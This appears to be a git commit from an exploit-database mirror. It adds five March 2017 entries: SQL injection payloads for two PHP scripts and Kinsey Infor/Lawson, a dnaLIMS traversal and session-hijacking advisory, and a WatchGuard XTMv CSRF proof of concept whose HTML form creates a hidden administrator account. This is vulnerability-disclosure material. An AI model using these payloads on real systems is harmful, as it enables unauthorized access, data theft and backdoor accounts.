DB: 2017-03-11
5 new exploits Price Comparison Script 2017.1.8 - SQL Injection Clickbank Affiliate Marketplace Script 2017 - SQL Injection Kinsey Infor/Lawson / ESBUS - SQL Injection WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
This commit is contained in:
parent
6e7ec5be32
commit
f2327bc214
6 changed files with 372 additions and 0 deletions
|
@ -37488,3 +37488,8 @@ id,file,description,date,author,platform,type,port
|
|||
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
|
||||
41575,platforms/php/webapps/41575.txt,"Price Comparison Script 2017.1.8 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
|
||||
41576,platforms/php/webapps/41576.txt,"Clickbank Affiliate Marketplace Script 2017 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
|
||||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
114
platforms/cgi/webapps/41578.txt
Executable file
114
platforms/cgi/webapps/41578.txt
Executable file
|
@ -0,0 +1,114 @@
|
|||
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
|
||||
web-application
|
||||
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
|
||||
Date published: Mar 08, 2017
|
||||
Vendor: dnaTools, Inc.
|
||||
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
|
||||
USCERT VU: 929263
|
||||
|
||||
Vulnerability Summaries
|
||||
1) Improperly protected web shell [CVE-2017-6526]
|
||||
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
|
||||
a web shell included with the software running as the web user. However,
|
||||
sending a POST request to that page bypasses authentication checks,
|
||||
including the UID parameter within the POST request.
|
||||
|
||||
2) Unauthenticated Directory Traversal [CVE-2017-6527]
|
||||
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
|
||||
directory traversal attack. This allows an unauthenticated attacker to
|
||||
retrieve files on the operating system accessible by the permissions of the
|
||||
web server. This page also does not require authentication, allowing any
|
||||
person on the Internet to exploit this vulnerability.
|
||||
|
||||
3) Insecure Password Storage [CVE-2017-6528]
|
||||
An option, which is most likely the default, allows the password file
|
||||
(/home/dna/spool/.pfile) to store clear text passwords. When combined with
|
||||
the unauthenticated directory traversal vulnerability, it is possible to
|
||||
gain the username and password for all users of the software and gain
|
||||
complete control of the software.
|
||||
|
||||
4) Session Hijacking [CVE-2017-6529]
|
||||
Each user of the dnaLIMS software is assigned a unique four-digit user
|
||||
identification number(UID) upon account creation. These numbers appear to
|
||||
be assigned sequentially. Multiple pages of the dnaLIMS application require
|
||||
that this UID be passed as a URL parameter in order to view the content of
|
||||
the page.
|
||||
Consider the following example:
|
||||
The URL ahttp://<SERVER NAME
|
||||
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
|
||||
to view the page for sequencing requests for the user with the UID of 2410. The
|
||||
username parameter of the URL is the mechanism for authentication to the
|
||||
system. The first eight-digit number of the username parameter appears to
|
||||
be a session identifier as it changes every time the user logs in from the
|
||||
password.cgi page, however this value is not checked by the seqreq2N.cgi
|
||||
page. This allows an attacker to guess the four-digit UID of valid user
|
||||
accounts that have an active session. The user with the UID of 2419
|
||||
currently has an active session, so we can simply hijack this useras
|
||||
session by requesting this page and specifying the UID 2419.
|
||||
|
||||
5) Cross-site Scripting
|
||||
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
|
||||
reflected cross site scripting attack via GET request as seen in the
|
||||
following URL:
|
||||
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
|
||||
Alert("XSS") </SCRIPT>
|
||||
|
||||
6) Cross-site Scripting
|
||||
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
|
||||
reflected cross site scripting attack via POST request as seen in the
|
||||
example below. The * reflects a short name for a client, (ie Shorebreak
|
||||
Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
|
||||
vulnerable for all dnaLIMS installs.
|
||||
|
||||
7) Improperly Protected Content
|
||||
|
||||
Many of the pages within the admin interface are not properly protected
|
||||
from viewing by authenticated users. This can give an attacker additional
|
||||
system information about the system, or change system/software
|
||||
configuration.
|
||||
|
||||
Software was conducted on a live production system, therefore the pages
|
||||
themselves were tested, forms within these pages were not.
|
||||
|
||||
This is also not an exhaustive list of improperly protected pages:
|
||||
|
||||
cgi-bin/dna/configuration.cgi
|
||||
|
||||
cgi-bin/dna/createCoInfo.cgi
|
||||
|
||||
cgi-bin/dna/configSystem.cgi
|
||||
|
||||
cgi-bin/dna/combineAcctsN.cgi
|
||||
|
||||
Disclosure Timeline
|
||||
|
||||
Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
|
||||
securely exchange details of vulnerabilities identified
|
||||
|
||||
Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
|
||||
to PO box via Postal Service
|
||||
|
||||
Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
|
||||
Mail
|
||||
|
||||
Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
|
||||
report
|
||||
|
||||
Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receiptI3/4 suggests
|
||||
placing the software behind a firewall as a solution to the vulnerabilities.
|
||||
|
||||
Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
|
||||
some risk, but does not address the vulnerabilitiesI3/4 inquire if there is a
|
||||
plan to address the vulnerabilities
|
||||
|
||||
Thu, Dec 8, 2016, at 3:13 PM: Vendor replies aa|Yes, we have a plan. Please
|
||||
gather a DNA sequence, PO Number, or Fund Number and go to your local
|
||||
grocery store and see what it will buy you.a
|
||||
|
||||
Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT
|
||||
|
||||
Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
|
||||
assignment
|
||||
|
||||
Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly
|
||||
|
40
platforms/jsp/webapps/41577.txt
Executable file
40
platforms/jsp/webapps/41577.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
##################################################################
|
||||
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections
|
||||
##################################################################
|
||||
# Date: 3/10/2017
|
||||
##################################################################
|
||||
# Exploit Author: Michael Benich
|
||||
##################################################################
|
||||
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
|
||||
##################################################################
|
||||
# Version: ALL
|
||||
##################################################################
|
||||
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
|
||||
##################################################################
|
||||
# CVE: CVE-2017-6550
|
||||
##################################################################
|
||||
|
||||
Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:
|
||||
|
||||
1) TABLE parameter, PoC below
|
||||
|
||||
GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1
|
||||
|
||||
2) Query POST parameter
|
||||
|
||||
POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1
|
||||
|
||||
<--snip--http headers-->
|
||||
|
||||
QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB
|
||||
|
||||
A JSP webshell can then be written to the /esbus/ directory.
|
||||
##################################################################
|
||||
Timeline:
|
||||
|
||||
12/1/2016 - Contacted generic security emails
|
||||
12/1/2016 - Received response from vendor ("Thanks for the info...")
|
||||
2/27/2017 - Followed up with contact and intent to disclose. No reply.
|
||||
3/10/2017 - Disclosure
|
||||
##################################################################
|
||||
|
22
platforms/php/webapps/41575.txt
Executable file
22
platforms/php/webapps/41575.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.03.2017
|
||||
# Vendor Homepage: https://www.axisitp.com/
|
||||
# Software: https://www.axisitp.com/price-comparison-script.php
|
||||
# Demo: http://www.pricecomparisonscript.info/
|
||||
# Version: 2017.1.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
|
||||
# http://localhost/[PATH]/compare.php?pid=[SQL]
|
||||
# For example;
|
||||
# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
|
||||
# axisitp_newpcs
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41576.txt
Executable file
18
platforms/php/webapps/41576.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.03.2017
|
||||
# Vendor Homepage: https://www.axisitp.com/
|
||||
# Software: https://www.axisitp.com/clickbank-affiliate-marketplace-script.php
|
||||
# Demo: http://www.clickbank.axisitp.com/
|
||||
# Version: 2017
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
173
platforms/xml/webapps/41579.html
Executable file
173
platforms/xml/webapps/41579.html
Executable file
|
@ -0,0 +1,173 @@
|
|||
<!--
|
||||
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
|
||||
|
||||
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
|
||||
Advisory ID: KL-001-2017-004
|
||||
Publication Date: 2017.03.10
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: WatchGuard
|
||||
Affected Product: XTMv
|
||||
Affected Version: v11.12 Build 516911
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
|
||||
Impact: Privileged Access
|
||||
Attack vector: HTTP
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
Lack of CSRF protection in the Add User functionality of the
|
||||
XTMv management portal can be leveraged to create arbitrary
|
||||
administrator-level accounts.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
As observed below, no CSRF token is in use when adding a new
|
||||
user to the management portal.
|
||||
|
||||
POST /put_data/ HTTP/1.1
|
||||
Host: 1.3.3.7:8080
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 365
|
||||
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
|
||||
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
|
||||
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
|
||||
|
||||
The HTTP response indicates that the changes were successful.
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Content-Length: 68
|
||||
Expires: Sun, 28 Jan 2007 00:00:00 GMT
|
||||
Vary: Accept-Encoding
|
||||
Server: CherryPy/3.6.0
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Date: Sat, 10 Dec 2016 18:08:22 GMT
|
||||
Content-Type: application/json
|
||||
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
|
||||
Path=/; secure
|
||||
Connection: close
|
||||
|
||||
{"status": true, "message": ["The changes were saved successfully"]}
|
||||
|
||||
Now, the newly created backdoor account can be accessed.
|
||||
|
||||
POST /agent/login HTTP/1.1
|
||||
Host: 1.3.3.7:8080
|
||||
Accept: application/xml, text/xml, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: text/xml
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 414
|
||||
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
|
||||
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
|
||||
|
||||
The response below shows the application issuing an authenticated
|
||||
session cookie.
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Content-type: text/xml
|
||||
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
|
||||
Connection: close
|
||||
Date: Sat, 10 Dec 2016 19:55:26 GMT
|
||||
Server: none
|
||||
Content-Length: 751
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<methodResponse>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<struct>
|
||||
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
|
||||
<member><name>response</name><value></value></member>
|
||||
<member>
|
||||
<name>readwrite</name>
|
||||
<value><struct>
|
||||
<member><name>privilege</name><value>2</value></member>
|
||||
<member><name>peer_sid</name><value>0</value></member>
|
||||
<member><name>peer_name</name><value>error</value></member>
|
||||
<member><name>peer_ip</name><value>0.0.0.0</value></member>
|
||||
</struct></value>
|
||||
</member>
|
||||
</struct>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodResponse>
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has remediated this vulnerability in WatchGuard
|
||||
XTMv v11.12.1. Release notes and upgrade instructions are
|
||||
available at:
|
||||
|
||||
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc. and Joshua Hardin.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2017.01.13 - KoreLogic sends vulnerability report and PoC to
|
||||
WatchGuard.
|
||||
2017.01.13 - WatchGuard acknowledges receipt of report.
|
||||
2017.01.23 - WatchGuard informs KoreLogic that the
|
||||
vulnerability will be addressed in the forthcoming
|
||||
v11.12.1 firmware, scheduled for general
|
||||
availability on or around 2017.02.21.
|
||||
2017.02.22 - WatchGuard releases v11.12.1.
|
||||
2017.03.10 - KoreLogic public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
|
||||
<input type="hidden"
|
||||
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
|
||||
value="" />
|
||||
<input type="submit" value="Trigger" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
The contents of this advisory are copyright(c) 2017
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
||||
-->
|
Loading…
Add table
Reference in a new issue